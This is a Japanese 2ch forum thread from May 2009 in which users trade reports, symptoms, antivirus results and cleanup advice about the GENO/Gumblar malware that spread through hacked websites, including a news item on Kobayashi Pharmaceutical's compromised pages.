今日のは右下に三つくらい説明が出てクリックしたらおｋが出て
クリックした後にブラウザ閉じたらチェスト行き画面が出た

因みにフラッシュは最新版だがリーダーは７
でもリーダー嫌いなのでリーダーの設定を起動する時はお伺いを
しろにしてあるので勝手に起動はしていない
693 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:27:23 ]: >>691

はやい話でそういうこと

しかしこいつのハンパねえところは
IE以外でもヤられる可能性がないわけではないというところだ
694 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 03:32:29 ]: >>692
俺も警告音がなって、下に黄色い横長の警告文字が出てきて
すぐにＩＥを閉じたんだよ

で、その後に、「トロイの木馬」が検出されたってavastのウィンドウが出てきて
「チェストに移動」ってクリックしたのに、エラーになって移動できなかったんだよね

んで、すぐにTemporaryInternetFileの中身を削除して、avastで全ドライブをチェックしたんだけど、
何もウイルスとか出てこなかった・・・

これって、最初の警告音が出てavastが反応した時に、ウイルスサイトにアクセスする前に
防いでくれて、感染しなくて済んだって解釈でいいのかな？
チェストに移動できなかったのは、すぐにブラウザを閉じたから？
695 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:32:58 ]: 感染サイトにアクセスしてしまったよ
Avastがブロックしてくれたよﾏﾏﾝ…

いったいこのウイルスは
どのくらいの規模なのですか？
696 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 03:33:19 ]: >>695
チェストに移動できた？
697 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:34:15 ]: >>690
怖くてソース覗きに行く勇気ありませんｗ
二回ともｼﾞｬﾊﾞｽｸきった状態で警告された

隔離されているやつの名前はCACHE--002
ファイル名はあてにならないかもしれないがexeじゃなくてCACHEだった
698 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:37:13 ]: さっき知って飛んできました

みごとに感染してました　ｵﾜﾀ
699 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:38:14 ]: 感染したらどうすればいいですか？
700 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 03:38:22 ]: 感染しているか、していないか確認する方法ってありますかね？
701 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:40:52 ]: >>700

>>665にあります

感染したらインストールし直すしかないのでしょうか？
702 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:42:53 ]: >>699

ご愁傷さま

PCのOSクリーンインスコ入れ替えれ
703 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:43:36 ]: >>697
ソース見れればいろいろわかるんだが…
恐らく挿入されたJavaScriptに反応してるだけだと思うんで大丈夫だと思うけども
まあ気になるならクリーンインストールお勧め
704 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:44:03 ]: Avastが活躍する話が多いな
Aviraから乗り換えようか悩む
705 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:44:07 ]: キャッシュはこれか？
ttp://support.mozilla.com/ja/kb/Firefox+のキャッシュファイルがウイルスに感染した
706 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:45:43 ]: ｽﾚを見返したり、まとめ見たり、ｸﾞｸﾞったりすればすぐわかることだと思うけど、
クリーンインストール以外の解決策は今のところないよ
707 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:46:34 ]: あの今日一日で３つも感染しているホームページを開いてしまいました
TVはインフルエンザよりもこっちを報道するべきじゃないですか
708 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 03:50:16 ]: >>701
Ｍｅの場合は、どのファイルを見ればいいですか？
709 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:53:32 ]: Meまだ使ってる人多いのかな？
感染報告ないよね。気になるなぁ
710 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:55:10 ]: Me使っているくらいなら

感染していても無自覚なんじゃないか？
711 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:55:24 ]: >>698
何で調べたの？
712 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:56:01 ]: firefoxの話題が多いようだからさっきfirefox導入して
ieのお気に入りをfirefoxにインポートしたんだけど
そのあとspybotで検査してたらfirefoxに入っていたお気に入り全部がspybotに引っかかったんだけど800個ぐらい
一応元がfirefoxのお気に入りからという事がわかってるからあんまり気にしてないんだけど
今回の件と関係あるかな？
713 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:58:19 ]: >>711

上に出ていた方法で調べました

どうしよう orz
714 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:58:26 ]: >>712
spybotスレに似たような報告があったと思うが
誤検出っぽいよ
715 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 03:58:28 ]: とりあえず、ウィルスの作者を見つけ出して逮捕してくれ。
以前もこんな感じのことがあったよな。
その時は犯人が逮捕されたけれど。
勿論、外国で外国人が逮捕されたわけだがな。
被害が世界中に及ぶから性質が悪い。
716 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:00:34 ]: >>591
>本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布：ITpro
>tp://itpro.nikkeibp.co.jp/article/NEWS/20090514/330029/
の
>このプログラムをウイルスだと判定したのは14製品だけだった

この14製品を書かないと記事として片手落ちだろう。つーか知りたい。
多分ノートン先生は失格だろうなあ。
717 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:00:41 ]: ここまで危険なウイルスっていままでにあった？
知り合いが感染していたよ。
まじやばい。
718 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:03:33 ]: ニフティのオンラインスキャンしたけど感染してなくてほっとした。
バスター2009いれてて、ＵＲＬフィルタもフィッシングブロックも有効にしてるけど
XPだから油断できないな…

firefoxでも危険なんだよなコレ？
うかつにﾈｻﾌできねーじゃん…
719 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:04:34 ]: >>714
ええ、そうなの？
実は2回に分けて検出されたんだよね
1回目は500個ぐらいで
2回目は300個ぐらい
そんで全部修正して3回目には見つからなくなったけど
何それじゃspybotがfirefoxのお気に入りを誤検出してたということか
thx
720 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:05:39 ]: 感染したかどうかがわからんが
ニコニコみてたら（クリックした時）IEがよく固まるな。

つーか、発見から3ヶ月くらいたってない？
いまだ解決策はおろか、判別法も無しかよw
721 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:06:19 ]: sqlsodbc.chmはとりあえず改ざんされてない場合の場所に
ファイル名実行できた
AVASTがキャッシュ隔離したしカスペとスパイボットとAVAST
スキャンで感染０だったからもう寝るヽ(`Д´)ﾉ
722 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:06:40 ]: >>610
気象庁のレーダーとかアメダスとかな。
Operaとかだとサイト毎に設定できるんだが
今回のは気象庁のサイトだって汚染される可能性もあるしいやはや・・
723 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:07:04 ]: 発見から3ヶ月もたってるのか？これ。

さっきブログではじめて知ったよ。

どこかで報道されていないの？
724 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:08:15 ]: >>720
genoで見つかったのが4月最初くらいじゃなかったか？だから1ヵ月半くらいだと思う
genoより前から話題になってたらわからんけど
725 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:08:35 ]: システムの復元は無意味？
726 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:10:22 ]: >>725

クリンインスコをおすすめ
システムそのものを書き換えます
727 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:10:42 ]: >>725
感染したんならｸﾘｰﾝｲﾝｽﾄｰﾙ以外は意味ないよ
728 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:10:46 ]: ４月に楽天のスレでGENO感染楽天店舗対応最悪で
ﾌﾟﾁ祭があったけど我が身に這い寄ってくるとは
おもなんだナイアルラトホテプ
729 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:12:05 ]: >>727
はっきりと感染ってどうやったら判明するのか
明確な基準ないよな
730 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:13:18 ]: >>724

1ヶ月半なら、もっとニュースになっていてもいいよね？
検索してみても個人のページしか出てこないや
731 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:15:54 ]: 感染したら、クリーンインストールするしかない

って言うけどさ、そもそも感染しているのかどうか判別できないんだけど？
感染の有無を判定する方法って何か無いの？
732 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:16:02 ]: GENOウイルス大活躍だな、なんでこんなにすごいんだ？
733 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:16:16 ]: >>718

IEよりはだいぶましだが油断は禁物
734 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:17:23 ]: >>731

過去スレ、ちゃんと見たか？

完璧な判定方法がないからやべえんだよ、こいつは。
735 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:17:36 ]: とりあえず、avastでチェックかけたら大丈夫だった
あと、ニフティのオンラインスキャンで大丈夫なら感染してないって判断で良いのかな？
736 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:20:40 ]: 現状だと、セキュリティーソフト入れていても、次々と新種が出てきて対応できない
感じ？

どこのサイトで感染するか分からないという恐ろしい事態だな
(((( ；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
737 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:21:01 ]: www3.atword.jp/gnome/

こちらを見るとすごおおおおおおおくまずそうなのですが
この予感は当たっていますか？

ＮＴＴが感染しているなんて、信じられないのですが
738 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:22:52 ]: >>736

その通り
こいつは狙いやすい環境(IE)をチェックして感染しているのがたちが悪い
739 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:24:55 ]: >>736
んな感じ
とりあえず既にいろいろ言われてる対策はしておいたほうがいいとはおもう

>>737
そこはむしろ見ておいたほうが良いと思う。
心配ならまとめページのトップからもリンク張られてるし確認するといい
740 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:25:07 ]: Adobe Readerってアンインストールしてもいいんですか？
741 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:25:56 ]: >>740

使わないんならいいんじゃね？

不便だけどさｗ
742 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:27:41 ]: >>741
このウィルス知ってから何もかも恐る恐るって感じなんですよ･･･
とりあえず滅多に使わないんで消しときました
レスありがとうございます
743 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:27:46 ]: ウイルスバスター終わったので寝ます orz

明日みんなに連絡しなくちゃ…

みなさんもお気を付けて
744 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:29:10 ]: >>717
7年ぐらい前かNimdaの騒ぎは凄かったな。
NHKの7時のニュースでもトップ扱いだったかな。
745 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:30:27 ]: てかニフティで検索するのに
ニフティ感染してるの？？？？
746 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:31:09 ]: >>745
（ﾟДﾟ）

何だと・・・？
747 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:31:11 ]: >>737
もう一体何が起こってるのかさっぱりなんだが・・・

大塚製薬とSayMoveのほかにＮＴＴまで感染してんの？？
748 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:34:45 ]: >>746
前のﾚｽにも出てるけど
www3.atword.jp/gnome/
のｻｲﾄにかいてある

SAKURAインターネットさん
　www1722.sakura.ne.jp
　sv172.lolipop.jp
　sv11.chicappa.jp

株式会社 PURENIC JAPAN さん
　p09ns7.puretopure.jp
　
NTTコミュニケーションズさん
　120.29.185.234(VPS-TOKYO2)

ニフティサーブネットワーク(ニフティ株式会社さん
　61.121.100.119

の該当データの停止を行ってください。
何度Mail送っても反応無いので・・・・・
749 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:37:17 ]: >>745
マジかよ
さっきオンラインスキャンやってきたばっかだぞorz

早く寝てしまいたい…
750 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:38:08 ]: ニフティにアクセスしたらアウトなの？
751 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:38:45 ]: ニフティのセキュリティ情報サイトさっき見たばかりなんｄ
752 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:39:44 ]: マジでヤバイなこれｗ
753 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:39:58 ]: ニフティ今朝アクセスしたばっかり・・・。うｗぁああああああああああああああ
754 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:40:48 ]: けどコマンドプロンプトもレジストリエディタも普通に立ち上がったぞ
IEの挙動もなんともない
CPU使用率もいたって普通
755 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:41:27 ]: >>196
これって何をスキャンしたの？
ローカルに保存したファイルしかスキャンできないと思っていたんだけど、違うのか？
756 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:42:09 ]: 一気に感染拡大してるじゃん。しばらく安心してネット出来ないなこりゃ
757 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:44:31 ]: ニフティマジかよスキャンするためにわざわざIEでJS有効にしたのに・・・
758 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:44:34 ]: 専ﾌﾞﾗで2ｃｈ見るぶんには大丈夫だよね？
759 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:44:54 ]: avast反応よさそうなのでインスコしたらBeckyでメール受信出来なくなった
アンインスコした
760 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:45:23 ]: >>754
IEの挙動は元々おかしい（ＷｉｎＭｅなので・・・）んだけど、
ＭＳ－ＤＯＳプロンプトとレジストリエディタは立ち上がった

一応、感染してないってことで良いのかな？
761 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:45:38 ]: これて桜とかニフティでサーバーかりてる一部の感染じゃないの？
762 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 04:48:06 ]: >>754
ＣＰＵ使用率は元から100％な件・・・
763 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:48:39 ]: ニフティなんてスキャンするために何度も行ってるが
764 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:50:17 ]: もう疑心暗鬼になってるなｗ
よくあるパターンだｗ
765 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:52:57 ]: 怖くて再起動/シャットダウンできないｗｗｗ
寝たいよー
766 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:53:58 ]: ウインドウズアップデートしたら重すぎて怖い
767 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:54:39 ]: >>765
休止はダメなのか
768 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:55:19 ]: どうせサイトなんか持ってないし、挙動もおかしくないし、
（感染してるかどうかわかんないけど）騒動落ち着いてからOS入れなおそうかなｗ
何かもうアホらしくなってきたｗ
769 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 04:57:53 ]: www.nifty.comとはIPアドレスが違うから落ち着け
770 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:00:09 ]: あやしいURLを開こうとしたらウィルス対策ソフトって警告とか出ますかね
771 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 05:00:27 ]: >>765
俺もシャットダウン＆再起動できんわｗ
シャットダウンしたら最後、起動できなくなりそうでｗ

バックアップも取ってないし、終わったわ・・・
アダルトサイト見ていたわけでもないのに、何でウイルスに出くわすんだよ
772 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 05:01:47 ]: >>770
俺はavastでページ開く前に警告出たんだけど、何故かウイルスチェストに移動できなくて
果たして感染防止できたのか、感染してしまったのか判断できずに困ってる・・・
773 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:02:57 ]: >>772
挙動がおかしくなければ多分大丈夫
774 名前：765 mailto:sage [2009/05/15(金) 05:03:09 ]: よっしゃ、勇気を出して（ヤケクソで）再起動したけど
またここに戻ってこれたよおおおおおお

>>769ありがとねｗ
775 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:03:35 ]: >>772
まずはすぐに確認できるもの(regeditとか)だけ確認してみれば？
776 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:04:15 ]: >>771
案外アダルトサイトの方がウイルス対策や改竄対策をしっかりやっていて却って安心だったりして。
777 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:05:08 ]: これって感染したらすぐわかるもんなの？コマンドプロンプトやレジストリエディタなんて、普段はあんまり使わないし
特定のサイトに繋がらない、ブラウザが落ちるっていうのも何も知らない人だったら「ちょっと調子悪いなぁ」くらいにしか思わないんじゃ・・・。
778 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:06:33 ]: これだけ広まってれば大々的な対策されるのも時間の問題だよな、流石に
そうであってほしい
779 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 05:06:45 ]: >>773
Ｍｅのせいか、普段から挙動がおかしいので分からんｗ
>>775
とりあえず、ＭＳ－ＤＯＳプロンプトとregeditは起動できた
大丈夫なのかな？
>>776
それは言えてるｗ
意外とアダルトサイトってウイルスいないよねｗ
780 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:07:23 ]: >>760
Meってとっくにセキュリティー関連の更新が終わっているんじゃないの？
脆弱性の検査もされずに放置され、トロイとかの餌食になってると思うけど。
持っていないから、詳しくは知らんけど。
781 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:07:40 ]: Meは今んとこ感染報告ないからのう…
782 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 05:09:01 ]: >>780
２，３年前にサービス停止したね
でも、俺のＰＣはＭｅがＯＳなので、仕方が無く使ってるわ・・・
一応、Ｍｅでもavast入れていれば大丈夫だよね？
今回も警告出てくれたし
783 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:09:42 ]: GENOはどこからウィルスもらってきたわけ
784 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:09:55 ]: >>782
いや例えこのウイルスはブロックできてもそれ以外で問題山積みだから
窓から投げ捨てて安物のネットブックでも買って来い
785 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 05:12:17 ]: >>784
今日、電気屋に行って、ＰＣ物色して来たよ
ＯＳ（ＸＰ）がインストール済みのノートで５万５千くらいだったな
786 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:13:37 ]: Ｍｅは古すぎる、つまりネット絡みが貧弱なので
落とされる脆弱性はあっても乗っ取られる要素は2000よりも少ないと何かで読んだことがある。
98ＳＥからXPに移行したクチなのでMeは良く分からないな。
787 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:15:09 ]: 安いPCを探そうと思ったけど通販サイトや情報サイト覗くのが怖い件ｗ
788 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:16:39 ]: >>782
古いOS　脆弱性
でぐぐったら、トップにこれが出てきた。
熟読した方がいいと思う。
blog.hitachi-system.co.jp/01/316.html

詳しくは知らないけど、MEを使ってるのは、AdobeReaderの9.10以前を使っているよりも危険だと思う。
avastがウィルスの侵入を食い止めてくれても、脆弱性をついた攻撃をガードできるわけじゃないはず。
そもそも、セキュリティーメーカー側からしたら、時系列が逆だし。
789 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:21:27 ]: Windowsが狙われたとは言えmacを使う気になれないのはどうしてだろう。
790 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:23:22 ]: このウィルスの話題って外じゃ全然でてこないけど
かなりやばくないか
791 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:27:01 ]: 2ｃｈ内でもそこまで騒ぎになってないよな
苺きんたまの時とかの方がみんな騒いでた
セキュリティソフトを過信して安心しきってるってことかな
792 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:27:59 ]: >>790
大きい企業もやられているので圧力が・・・
個人情報も抜かれてるなんて知られた日には初心者はパニックになるよな。
793 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:32:54 ]: 4月の半ばになんかのサイト見ようとリンク押したら警告でたなぁ
もしかしたらこのウィルスかもしれん
794 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:44:18 ]: アドビのサイト開こうとするとブラウザが固まる
FireFoxならいけたんだけど何でだ
795 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 05:47:15 ]: 小林製薬のサイトよく見てたから怖くなってきた…
796 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 06:58:25 ]: 61.121.100.119って
hXXp://homepage.nifty.com/
のサーバーのIPアドレスか？
797 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 07:01:28 ]: なるほどwww.nifty.com行っても反応ないのか
798 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 07:03:38 ]: 見に行ったら表示されないなあ
799 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 07:08:42 ]: 再起動したけど、とりあえず普通に立ち上がったわ
CPU使用率も問題ないし、regeditも起動できた

感染してないってことでOK？
800 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 07:16:39 ]: Nimdaは感染経路がいくつもあったからある意味「責任逃れ」ができたんだけど、
GENOウイルスはサイト管理者のPCが感染→そこからFTPを通してサイトが改ざん→
そのサイトにアクセスすることで感染、と経路（つまり責任）がはっきりしているから
「お前のせいで感染したんだ！どうしてくれる！」「怖いからもうそこでは買わない、
それどころかそのサイトに行きたくもない」と企業や個人の責任問題にされかねない
801 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 07:21:05 ]: aguse.jpが全然役に立たない理由が↓見てわかったわ。
ilion.blog47.fc2.com/blog-entry-128.html

jscript.dllのバージョンを調べて、本当にIEで表示してるのかを確認してるから、
UAを偽装してアクセスしても検出されないんだ。
スクリプトの難読化パターンも多いし、シグネチャベースの検知はかなり難しいね。
オンラインスキャンもほとんど無意味だし、avast入れておくのがいちばんかも。
とりあえずIEを使わないってだけでも、現時点では効果があるけど、改変版でも
大丈夫かどうかわからないし。
802 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 07:22:49 ]: ノートン無反応か・・・早く対応すればいいのに
803 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 07:58:08 ]: 2009/5/14 22:39 - 小林製薬 (4967) は12日、同社のホームページが何者かによって改ざんされ、
ホームページにアクセスするとウィルスに感染するようになっていたとして、
ウィルス感染が判明したホームページを当面の間、閉鎖したことを発表した。
　同社によると感染が明らかになったホームページは
「暮らしのヒントお知らせ隊（hint.kobayashi.co.jp/）」「ハナノアブランドサイト（hint.kobayashi.co.jp/hananoa/）」
「イージーファイバーブランドサイト（hint.kobayashi.co.jp/easyfiber/）」の3つ。
　それぞれ、5月9日5時27分から5月11日21日27分までこれらのホームページにアクセスした人は、
ウィルスに感染した可能性があるとして、感染の有無を確認するように呼びかけている。
　ウィルスに感染した場合、sqlsodbc.chmの改変、コマンドプロンプトが起動不能、レジストリエディタが起動不能などの症状が発生するとしている。
　尚、同社ではMacとWindows Vistaに関してはこのウィルスには感染する恐れはないとも述べている。
ttp://www.technobahn.com/cgi-bin/news/read2?f=200905142239
804 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:00:29 ]: >同社のホームページが何者かによって改ざんされ
805 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:07:57 ]: aguseは、GENO祭りの真っ最中もまったく役立たずだったな。
何度調べさせてもセフセフ。
806 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:08:06 ]: GDATA(avast)は対応済みか、、、後常にJSを切ってる人
807 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:12:09 ]: ↑見たらJSあっても無くても感染するのか。
808 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 08:14:06 ]: ﾌﾗｯｼｭﾌﾟﾚｲﾖー10って小数点以下の違いある？
ｱﾄﾞﾋﾞﾘｰﾀﾞｰ9.10と9.11みたいな違い。
809 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:15:49 ]: 違いがないのに数だけ増やしてると思ってるの？
810 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:15:59 ]: >>805
zlkonやgumblarがアクセス制御かけて同じホストからの接続には
しばらく(?)無害になるのでサーバーサイドのチェッカの類はほぼ効かない
(初回は有害判定されるかもしれんけど、たぶんJScript.dllチェックで蹴られておしまい)。
NortonSafeWebもセーフ判定のまま。
811 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:26:25 ]: >>803
確認して感染が見つかったらどう責任とってくれるんだよｗｗｗ
812 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:27:17 ]: >>803
＞同社のホームページが何者かによって改ざんされ

ｗ
813 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:29:28 ]: GENOにくらべたら対応がいいほう
814 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:30:48 ]: アンチウィルスのパターンファイルもアテにならないし、ヒューリスティック頼みだな。
そのヒューリスティックもAvast!以外は無力みたいだし、Avast!も亜種すべてに
反応するかわからんし、困ったもんだな。
JavaScriptの埋め込みによるリダイレクトじゃなくて、hrefタグを書き換えるような
形になってしまったらAvast!も反応しないんじゃないかな？
815 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 08:30:57 ]: >>809
そうじゃなくて10にも種類があるのか知りたい。
前に10にしたけど知らない間に新しいの出てると困る。
816 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:33:42 ]: >>815
FLASH バージョン　でググって最新版か確認汁
817 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:34:08 ]: >>815
Acrobat ReaderなりAcrobatなりを立ち上げて、ヘルプメニューの「アップデートの有無をチェック」
してみればいいよ。インストールされているAdobe製品全般のアップデート確認が行われるから。
818 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:35:54 ]: >>809の突っ込み方はないわなｗ
819 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:36:58 ]: >>817
それ、なぜかFlashは対象になってない気がする。Reader、Acrobat、PhotoShop等は
アップデートされるんだけどね。
820 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:41:05 ]: まぁFlashPlayerはそれ単体で起動するものではなくブラウザから呼ばれる物だからね。
IEならFlash置いてあるサイト管理者がobjectタグにバージョン書いとけばそれ以下ならIEに更新を促される。
821 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:41:44 ]: 何が目的かわからんが、現在の最新版と今自分が使ってる版を確認したければここを開け
www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
822 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:42:49 ]: >>819
Flashはここで見れるよ
823 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 08:43:12 ]: >>814
やっぱ、avastって凄いのか？
824 名前：822 mailto:sage [2009/05/15(金) 08:43:37 ]: 貼り忘れた　org

ttp://www.adobe.com/jp/software/flash/about/
825 名前：822 mailto:sage [2009/05/15(金) 08:44:18 ]: orz 　(^^;
826 名前：名無しさん＠お腹いっぱい。 [2009/05/15(金) 08:46:12 ]: 有料のノートンとかバスターより無料のavastが凄いとか、どういうことよ？
827 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:46:18 ]: JAVAスクリプトのソースに、ノートンのオートプロテクトは反応しないのか
828 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:48:29 ]: >>823
Genoに関してはね。
過剰に反応することも多いし、FWやアンチスパイウェアとも組み合わせなければ
いけないから、PCにあまり詳しくない人には勧めにくいんだよな。
家族が使ってるPCのセキュリティソフト、どうすっかな。
829 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:48:48 ]: バスターは元々無料のより使えないけどな
830 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:50:45 ]: >>827
しないね。難読化パターンがいろいろあるし。
831 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/15(金) 08:52:42 ]: このウイルスの怖さを周りや上司にいっても
「ふーん」で終わって、ちゃんとupdateの確認さえしたかも怪しい。。

これが普通なのかな、ちゃんと説明した自分が空しい。。
